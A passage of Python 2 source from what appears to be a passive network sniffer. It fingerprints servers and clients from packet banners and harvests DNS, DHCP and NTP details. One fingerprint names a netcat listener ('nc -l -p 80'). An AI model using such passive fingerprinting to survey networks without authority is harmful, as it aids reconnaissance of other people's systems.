(LiveTCPService[Service] == True)) ):\n\t\t\t\t\tLiveTCPService[Service] = False\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"closed\", '')\n\t\t\telif ((p['TCP'].flags & 0x3F) == 0x15) and (sport == \"113\"):\t#FIN, RST, ACK (SYN, PSH, URG off)\n\t\t\t\t#This may be a firewall or some other device stepping in for 113 with a FIN/RST.\n\t\t\t\tpass\n\t\t\telif (p['TCP'].flags & 0x17) == 0x10:\t#ACK (RST, SYN, and FIN off)\n\t\t\t\t#FIXME - check for UnhandledPacket placement in ACK\n\t\t\t\tFromPort = sIP + \",TCP_\" + sport\n\t\t\t\tToPort = dIP + \",TCP_\" + dport\n\t\t\t\tPayload = str(p['Raw.load'])\t\t\t#For some reason this doesn't handle p['Raw'].load\n\t\t\t\tif ( (LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True) and (LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\n\t\t\t\t\tprint \"Logic failure: both \" + FromPort + \" and \" + ToPort + \" are listed as live services.\"\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\telif ((LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True)):\t#If the \"From\" side is a known TCP server:\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort) ):\t\t#Check nmap fingerprint strings for this server port\n\t\t\t\t\t\tif (ServiceFPs.has_key(int(sport))):\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs[int(sport)]:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\t#Debugging:\n\t\t\t\t\t\t\t\t\t#FIXME - removeme once understood:\n\t\t\t\t\t\t\t\t\t#File \"/home/wstearns/med/programming/python/passer/passer.py\", line 504, in processpacket\n\t\t\t\t\t\t\t\t\t#OutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\t#TypeError: expected a character buffer object\n\t\t\t\t\t\t\t\t\tif (OneTuple[1] == None):\n\t\t\t\t\t\t\t\t\t\tDebug(\"Null description for \" + OneTuple[0])\n\t\t\t\t\t\t\t\t\t\t#quit()\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\t#Example: Replace \"$1\" with MatchObj.group(1)\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), str(MatchObj.group(Index)))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t#Exit for loop, no need to check any more fingerprints now that we've found a match\n\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort)):\t\t#If the above loop didn't find a server description\n\t\t\t\t\t\tif (ServiceFPs.has_key('all')):\t\t\t\t#Now recheck against regexes not associated with a specific port (port 'all').\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs['all']:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif (not ManualServerDescription.has_key(FromPort) ):\n\t\t\t\t\t\tif (sport == \"22\") and (Payload != None) and (Payload.find('SSH-') > -1):\n\t\t\t\t\t\t\tif ( (Payload.find('SSH-1.99-OpenSSH_') > -1) or (Payload.find('SSH-2.0-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/openssh\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/openssh\"\n\t\t\t\t\t\t\telif (Payload.find('SSH-1.5-') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/generic\"\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' ESMTP Sendmail ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/sendmail\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/sendmail\"\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' - Welcome to our SMTP server ESMTP') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t#Check for port 80 and search for \"Server: \" once\n\t\t\t\t\t\telif (sport == \"80\") and (Payload != None) and (Payload.find('Server: ') > -1):\n\t\t\t\t\t\t\tif (Payload.find('Server: Apache') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/apache\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/apache\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Embedded HTTP Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/embedded\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/embedded\"\n\t\t\t\t\t\t\telif (Payload.find('Server: gws') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/gws\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/gws\"\n\t\t\t\t\t\t\telif (Payload.find('Server: KFWebServer') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/kfwebserver\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/kfwebserver\"\n\t\t\t\t\t\t\telif (Payload.find('Server: micro_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/micro-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/micro-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Microsoft-IIS') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/iis\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/iis\"\n\t\t\t\t\t\t\telif (Payload.find('Server: lighttpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/lighttpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/lighttpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: MIIxpc') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mirrorimage\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mirrorimage\"\n\t\t\t\t\t\t\telif (Payload.find('Server: mini_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mini-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mini-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nc -l -p 80') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nc\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nc\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nginx/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nginx\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nginx\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Nucleus') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nucleus\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nucleus\"\n\t\t\t\t\t\t\telif (Payload.find('Server: RomPager') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/rompager\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/rompager\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/server\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/server\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Sun-ONE-Web-Server/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/sun-one\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/sun-one\"\n\t\t\t\t\t\t\telif (Payload.find('Server: TrustRank Frontend') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/trustrank\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/trustrank\"\n\t\t\t\t\t\t\telif (Payload.find('Server: YTS/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/yahoo\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/yahoo\"\n\t\t\t\t\t\t\telif (Payload.find('HTTP/1.0 404 Not Found') > -1) or (Payload.find('HTTP/1.1 200 OK') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/generic\"\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"110\") and (Payload != None) and (Payload.find('POP3 Server Ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"pop3/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"pop3/generic\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find('* OK dovecot ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/dovecot\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/dovecot\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find(' IMAP4rev1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"783\") and (Payload != None) and (Payload.find('SPAMD/1.1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"spamd/spamd\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"spamd/spamd\"\n\t\t\t\t\t\telif ( (sport == \"3128\") or (sport == \"80\") ) and (Payload != None) and (Payload.find('Via: ') > -1) and (Payload.find(' (squid/') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"proxy/squid\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"proxy/squid\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\telif ((LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\t\t#If the \"To\" side is a known TCP server:\n\t\t\t\t\tClientKey = sIP + \",TCP_\" + dport\t#Note: CLIENT ip and SERVER port\n\t\t\t\t\tif (not ClientDescription.has_key(ClientKey)):\n\t\t\t\t\t\tif (dport == \"22\") and (Payload != None) and ( (Payload.find('SSH-2.0-OpenSSH_') > -1) or (Payload.find('SSH-1.5-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"ssh/openssh\")\n\t\t\t\t\t\t#As cute as it is to catch this, it miscatches any relay that's carrying a pine-generated mail.\n\t\t\t\t\t\t#elif (dport == \"25\") and (Payload != None) and (Payload.find('Message-ID: <Pine.') > -1):\n\t\t\t\t\t\t#\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"smtp/pine\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: libwww-perl/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/libwww-perl\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Lynx') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/lynx\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Mozilla') > -1) and (Payload.find(' Firefox/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/firefox\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Wget/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/wget\")\n\t\t\t\t\t\telif (dport == \"143\") and (Payload != None) and (Payload.find('A0001 CAPABILITY') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"imap/generic\")\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\t\t\telif (dport == \"783\") and (Payload != None) and (Payload.find('PROCESS SPAMC') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"spamd/spamc\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\telse:\t#Neither port pair is known as a server\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t#Following is debugging at best; it should only show up early on as the sniffer listens to conversations for which it didn't hear the SYN/ACK\n\t\t\t\t\t#print \"note: neither \" + FromPort + \" nor \" + ToPort + \" is listed as a live service.\"\n\t\t\telse:\t#Other TCP flag combinations here\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 17 and (type(p['UDP']) == UDP):\t\t#UDP. We have to check the object type as well as we do get (corrupted? truncated?) packets with type 17 that aren't udp: AttributeError: 'NoneType' object has no attribute 'sport'\n\t\t\t#FIXME - possibly run udp packets through ServiceFPs as well?\n\t\t\tsport=str(p['UDP'].sport)\n\t\t\tdport=str(p['UDP'].dport)\n\t\t\tSrcService = sIP + \",UDP_\" + sport\n\t\t\tDstService = dIP + \",UDP_\" + dport\n\t\t\tSrcClient = sIP + \",UDP_\" + dport\n\t\t\tPayload = p['Raw.load']\n\n\t\t\t#Multicast DNS: http://files.multicastdns.org/draft-cheshire-dnsext-multicastdns.txt\n\t\t\t#- usually sent to 224.0.0.251 (or FF02::FB) (link-local multicast).\n\t\t\t#\t- if \".local.\" in query, these MUST be the target IPs\n\t\t\t#\t- non-local queries may be sent to these or normal dns servers\n\t\t\t#\t- rdns queries for \"254.169.in-addr.arpa.\" MUST be sent to 224.0.0.251\n\t\t\t#\t- rdns queries for \"8.e.f.ip6.arpa.\", \"9.e.f.ip6.arpa.\",\"a.e.f.ip6.arpa.\", and \"b.e.f.ip6.arpa.\" MUST be sent to the IPv6 mDNS link-local multicast address FF02::FB.\n\t\t\t#- sent to udp port 5353\n\t\t\t#- generic clients may use \"single-dns-object.local.\", such as \"sparrow.local.\"\n\t\t\t#- responses have IP TTL = 255 to check that packet originated on-lan\n\n\t\t\t#Multicast DNS, placed next to normal dns, out of numerical order\n\t\t\tif (dport == \"5353\") and ( (p['IP'].ttl == 1) or (p['IP'].ttl == 255) ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcClient)) or (LiveUDPService[SrcClient] == False)):\n\t\t\t\t\tLiveUDPService[SrcClient] = True\n\t\t\t\t\tif (dIP == \"224.0.0.251\"):\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/broadcastclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/client\")\n\n\t\t\t\t\t#Extract dns answers like with 53; change elif to if and add 5353 to ports on next if?\n\t\t\t\t\t#At the moment, no; scapy does not appear to parse 5353 as dns.\n\t\t\t\t\t#else:\n\t\t\t\t\t#\tUnhandledPacket(p)\n\t\t\t#FIXME - add check for \"if isinstance(p['DNS'], whatevertype):\there and at all p[] accesses.\n\t\t\telif (sport == \"53\") and (isinstance(p['DNS'], DNS)) and (p['DNS'].qr == 1):\t\t#qr == 1 is a response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t#FIXME - Also report the TLD from one of the query answers to show what it's willing to answer for?\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"dns/server\")\n\t\t\t\t#Now we extract dns answers. First, check that there's no dns error:\n\t\t\t\tif (p['DNS'].rcode == 0):\t\t\t#No error\n\t\t\t\t\tDNSBlocks = [ ]\n\t\t\t\t\tCNAMERecs = [ ]\t\t\t\t#We hold onto all cnames until we've processed all PTR's and A's here\n\t\t\t\t\tif (p['DNS'].ancount > 0):\t\t#If we have at least one answer from the answer block, process it\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].an)\n\t\t\t\t\tif (p['DNS'].arcount > 0):\t\t#Likewise for the \"additional\" block\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].ar)\n\t\t\t\t\tfor OneAn in DNSBlocks:\n\t\t\t\t\t\t#Thanks to Philippe Biondi for showing me how to extract additional records.\n\t\t\t\t\t\t#Debug(\"Start dns extract\" + str(p['DNS'].ancount))\n\t\t\t\t\t\t#OneAn = p[DNS].an\n\t\t\t\t\t\t#while OneAn is not NoPayload:\t\t#This doesn't seem to stop at the end of the list; incorrect syntax.\n\t\t\t\t\t\twhile isinstance(OneAn,DNSRR):\t\t#Somewhat equivalent:\twhile not isinstance(an, NoPayload):\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t#print \"Type: \" + str(type(OneAn))\t\t#All of type scapy.DNSRR\n\t\t\t\t\t\t\tif (OneAn.rclass == 1) and (OneAn.type == 1):\t\t#\"IN\" class and \"A\" type answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\t#Check new hostname to see if it's in the list.\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",A\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",A\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"A\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 2):\t\t\t#\"IN\" class and \"NS\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Perhaps later\n\t\t\t\t\t\t\t\t#Like cnames, this is object -> nameserver hostname, so these would need to be queued like cnames until we're done with A's and PTR's.\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 5):\t\t\t#\"IN\" class and \"CNAME\" answer\n\t\t\t\t\t\t\t\tCNAMERecs.append(OneAn)\t\t\t\t\t#Remember the record; we'll process these after the PTR's and A's\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 6):\t\t\t#\"IN\" class and \"SOA\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Not immediately useful, perhaps later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 12):\t\t#\"IN\" class and \"PTR\" type answer\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#For input of '182.111.59.66.in-addr.arpa.' :\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rrname.replace(\".in-addr.arpa.\", \"\")\t\t# '182.111.59.66'\n\t\t\t\t\t\t\t\tDNSIPAddr = DNSIPAddr.split('.')\t\t\t\t# ['182', '111', '59', '66']\n\t\t\t\t\t\t\t\tDNSIPAddr.reverse()\t\t\t\t\t\t# ['66', '59', '111', '182']\n\t\t\t\t\t\t\t\tDNSIPAddr = string.join(DNSIPAddr, '.')\t\t\t\t# '66.59.111.182'\n\t\t\t\t\t\t\t\t#Check that we end up with a legal IPv4 address before continuing; we're getting garbage.\n\t\t\t\t\t\t\t\tif (re.search('^[1-9][0-9\\.]*[0-9]$', DNSIPAddr) == None):\n\t\t\t\t\t\t\t\t\tDebug(\"Odd PTR rrname: \" + OneAn.rrname)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tDNSHostname = OneAn.rdata.lower()\n\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",PTR\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",PTR\"])):\n\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"PTR\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 15):\t\t#\"IN\" class and \"MX\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Possibly later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 28):\t\t#\"IN\" class and \"AAAA\" answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata.upper()\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",AAAA\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",AAAA\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"AAAA\", DNSHostname, \"\")\n\n\t\t\t\t\t\t\t#Move to the next DNS object in the \"an\" block\n\t\t\t\t\t\t\tOneAn = OneAn.payload\n\t\t\t\t\tfor OneCNAME in CNAMERecs:\t\t#Now that we have all A/PTR's, go back and turn cname records into pseudo-A's\n\t\t\t\t\t\tif isinstance(OneCNAME,DNSRR):\n\t\t\t\t\t\t\tAlias = OneCNAME.rrname.lower()\n\t\t\t\t\t\t\tExisting = OneCNAME.rdata.lower()\n\t\t\t\t\t\t\tif isFQDN(Alias) and isFQDN(Existing):\n\t\t\t\t\t\t\t\tif HostIPs.has_key(Existing):\n\t\t\t\t\t\t\t\t\tfor OneIP in HostIPs[Existing]:\t\t\t\t#Loop through each of the IPs for the canonical name, and\n\t\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(OneIP + \",CNAME\")) or (not(Alias in DNSRecord[OneIP + \",CNAME\"])):\n\t\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", OneIP, \"CNAME\", Alias, \"\")\t#report them as kind-of A records for the Alias.\n\t\t\t\t\t\t\t\t#If we don't have a A/PTR record for \"Existing\", just ignore it. Hopefully we'll get the Existing A/PTR in the next few answers, and will re-ask for the CNAME later, at which point we'll get a full cname record.\n\t\t\t\t\t\t\t\t#else:\n\t\t\t\t\t\t\t\t#\tDebug(\"CNAME \" + Alias + \" -> \" + Existing + \" requested, but no IP's for the latter, skipping.\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tDebug(\"One of \" + Alias + \" and \" + Existing + \" isn't an FQDN, skipping cname processing.\")\n\t\t\t\telif (p['DNS'].rcode == 1):\t\t\t#FormErr: server responding to an improperly formatted request\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 2):\t\t\t#ServFail: domain exists, root nameservers list authoritative name servers, but authNS's won't answer queries\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 3):\t\t\t#NXDOMAIN: root nameservers don't have any listing (domain doesn't exist or is on hold)\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 5):\t\t\t#Query refused\n\t\t\t\t\tpass\n\t\t\t\telse:\t#rcode indicates an error\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"53\") and (type(p['DNS']) == DNS) and (p['DNS'].qr == 0):\t#dns query\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"dns/client\")\n\t\t\telif (sport == \"67\") and (dport == \"68\"):\t\t#Bootp/dhcp server talking to client\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"bootpordhcp/server\")\n\t\t\telif (sport == \"68\") and (dport == \"67\"):\t\t#Bootp/dhcp client talking to server\n\t\t\t\tif (sIP != \"0.0.0.0\"):\t\t\t\t#If the client is simply renewing an IP, remember it.\n\t\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"bootpordhcp/client\")\n\t\t\t\t#else:\t\t\t\t\t\t#If you want to record which macs are asking for addresses, do it here.\n\t\t\t\t#\tpass\n\t\t\telif (sport == \"123\") and (dport == \"123\") and (p['NTP'].stratum != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/generic\")\n\t\t\telif (dport == \"123\") and ( (dIP == \"216.115.23.75\") or (dIP == \"216.115.23.76\") or (dIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ntp/vonageclient\")\n\t\t\telif (sport == \"123\") and ( (sIP == \"216.115.23.75\") or (sIP == \"216.115.23.76\") or (sIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", 